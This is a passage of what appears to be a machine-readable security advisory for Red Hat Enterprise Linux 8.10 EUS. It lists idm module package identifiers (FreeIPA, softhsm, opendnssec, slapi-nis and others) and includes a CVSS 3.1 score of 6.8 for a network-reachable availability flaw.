"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
